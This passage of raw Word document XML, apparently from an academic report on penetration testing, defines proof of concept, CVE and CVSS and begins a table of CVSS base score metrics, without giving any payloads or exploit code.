        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00556DBD" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="2C3A82FD" w14:textId="37E004B5" w:rsidR="00942CE1" w:rsidRPr="00D77DFE" w:rsidRDefault="002065C7" w:rsidP="00317F9F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc223521096"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="009E776C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00942CE1" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Proof of Concept</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="773E2D87" w14:textId="20F4296C" w:rsidR="00084D54" w:rsidRPr="00D77DFE" w:rsidRDefault="007415D1" w:rsidP="00C429C8">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Proof of Concept involves d</w:t>
      </w:r>
      <w:r w:rsidR="00CC776D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>emonstrating proof of an existing vulnerability by providing step-by-step instructions on how an attacker can take advantage of and exploit it. This can include screenshots or a video demonstrating the exploit in a browser (e.g., an XSS payload) or dumping the database version in the case of an SQL injection. This depends on the type of vulnerability.</w:t>
      </w:r>
      <w:r w:rsidR="00192A1E" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="42" w:name="paragraph16"/>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"resource16"</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00192A1E" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[16]</w:t>
      </w:r>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00192A1E" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="665CA9A2" w14:textId="4D815F9F" w:rsidR="005B2BE0" w:rsidRPr="00D77DFE" w:rsidRDefault="002065C7" w:rsidP="00A003DF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc223521097"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="009E776C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00712E47" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE and CVSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidR="00712E47" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F68D99C" w14:textId="2B0F1773" w:rsidR="005B2BE0" w:rsidRPr="00D77DFE" w:rsidRDefault="00CC776D" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CVE (Common Vulnerabilities and Exposures) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>represents a database of known cybersecurity vulnerabilities. Each vulnerability is assigned a unique ID along with basic information such as a description, dates, and references for each security flaw.</w:t>
      </w:r>
      <w:r w:rsidR="00B12294" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="44" w:name="Paragraph17"/>
      <w:r w:rsidR="00CA48B4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00CA48B4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "Resource17"</w:instrText>
      </w:r>
      <w:r w:rsidR="00CA48B4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00CA48B4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B12294" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[17]</w:t>
      </w:r>
      <w:r w:rsidR="00CA48B4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:p w14:paraId="1F2140BB" w14:textId="59BD12CF" w:rsidR="002D58A1" w:rsidRPr="00D77DFE" w:rsidRDefault="00CC776D" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS (Common Vulnerability Scoring System) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">is a framework designed to assign severity scores to CVEs using various factors such as attack vector, impact, and other metrics, </w:t>
      </w:r>
      <w:r w:rsidR="005F447F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> prioritize the importance of each identified vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00E821A4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in Table 3.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007B11D8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F447F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, it produces a Base score (0-10) which defines the rate of the danger of the vulnerability </w:t>
      </w:r>
      <w:bookmarkStart w:id="45" w:name="Paragraph18"/>
      <w:r w:rsidR="00CA48B4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00CA48B4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "Resource18"</w:instrText>
      </w:r>
      <w:r w:rsidR="00CA48B4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00CA48B4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F447F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[18]</w:t>
      </w:r>
      <w:r w:rsidR="00CA48B4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidR="005F447F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003B5D99" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">To determine the severity of a vulnerability, the following metrics must be estimated </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003B5D99" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003B5D99" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> calculate the base score (0–10), which remains stable over time [32]. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A540B81" w14:textId="0E6617EF" w:rsidR="00E821A4" w:rsidRPr="00D77DFE" w:rsidRDefault="00E821A4" w:rsidP="00DF2376">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Table.3.1: Base Score Components</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831"/>
        <w:gridCol w:w="2831"/>
        <w:gridCol w:w="2831"/>
      </w:tblGrid>
      <w:tr w:rsidR="00945AF9" w:rsidRPr="00D77DFE" w14:paraId="703CCF05" w14:textId="77777777" w:rsidTr="00E821A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57C2C98A" w14:textId="26F0CE00" w:rsidR="00945AF9" w:rsidRPr="00D77DFE" w:rsidRDefault="00945AF9"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 xml:space="preserve">Metric </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66BA9570" w14:textId="0D78BD64" w:rsidR="00945AF9" w:rsidRPr="00D77DFE" w:rsidRDefault="00945AF9"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 xml:space="preserve">Description </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F03CF84" w14:textId="3601764A" w:rsidR="00945AF9" w:rsidRPr="00D77DFE" w:rsidRDefault="00945AF9"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 xml:space="preserve">Possible values </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00945AF9" w:rsidRPr="00D77DFE" w14:paraId="326157E8" w14:textId="77777777" w:rsidTr="00E821A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67DEEB60" w14:textId="0D936905"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Attack Vector (AV)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DF8A5C0" w14:textId="59173CAB" w:rsidR="00945AF9" w:rsidRPr="00D77DFE" w:rsidRDefault="005F447F" w:rsidP="00E821A4">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>the level of access and proximity required by an attacker to exploit a vulnerability</w:t>
            </w:r>
            <w:r w:rsidR="00460042" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76FBBBD2" w14:textId="2A5E37E5"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Network (N), Adjacent (A), Local (L), Physical (P)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00945AF9" w:rsidRPr="00D77DFE" w14:paraId="11DAD205" w14:textId="77777777" w:rsidTr="00E821A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B76396B" w14:textId="43E494AF"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Attack Complexity (AC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6185AB6A" w14:textId="78F17B96" w:rsidR="00945AF9" w:rsidRPr="00D77DFE" w:rsidRDefault="00460042" w:rsidP="00E821A4">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Conditions</w:t>
            </w:r>
            <w:r w:rsidR="00E821A4" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>beyond the attacker’s control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="600DF0C6" w14:textId="27DD4DA3" w:rsidR="00945AF9" w:rsidRPr="00D77DFE" w:rsidRDefault="00460042" w:rsidP="00E821A4">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low (L), High (H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00945AF9" w:rsidRPr="00D77DFE" w14:paraId="090221A5" w14:textId="77777777" w:rsidTr="00E821A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12B7C77C" w14:textId="27C03B92"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Privileges Required (PR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F6CA655" w14:textId="4D31EEF9" w:rsidR="00945AF9" w:rsidRPr="00D77DFE" w:rsidRDefault="00460042" w:rsidP="00E821A4">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Level of privileges required to perform this attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7635CCE3" w14:textId="32C2856F"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None (N), Low (L), High (H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00945AF9" w:rsidRPr="00D77DFE" w14:paraId="1F40B71A" w14:textId="77777777" w:rsidTr="00E821A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31D1701D" w14:textId="4D400A26"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User Interaction (UI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AC6D2B7" w14:textId="1BA02ECA"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Required from the user to perform an action to execute the attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="488E8993" w14:textId="1DC1196D"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None (N), Required (R)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00945AF9" w:rsidRPr="00D77DFE" w14:paraId="311C4357" w14:textId="77777777" w:rsidTr="00E821A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10BD2D1A" w14:textId="41B709F6"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Scope (S)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4477EAF4" w14:textId="3CC9A4E3" w:rsidR="00945AF9" w:rsidRPr="00D77DFE" w:rsidRDefault="00460042" w:rsidP="00E821A4">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The</w:t>
            </w:r>
            <w:r w:rsidR="00E821A4" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>vulnerability affects other systems beyond its scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="477D686F" w14:textId="29864339" w:rsidR="00945AF9"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Unchanged (U), Changed (C)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00460042" w:rsidRPr="00D77DFE" w14:paraId="5B528933" w14:textId="77777777" w:rsidTr="00E821A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A6F51AE" w14:textId="7CA216F5" w:rsidR="00460042"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Confidentiality Impact (C)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B9D5CB7" w14:textId="30145E64" w:rsidR="00460042" w:rsidRPr="00D77DFE" w:rsidRDefault="00620181" w:rsidP="00E821A4">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Data disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EFA81CE" w14:textId="118DC1EB" w:rsidR="00460042"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None (N), Low (L), High (H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00460042" w:rsidRPr="00D77DFE" w14:paraId="1E17B378" w14:textId="77777777" w:rsidTr="00E821A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
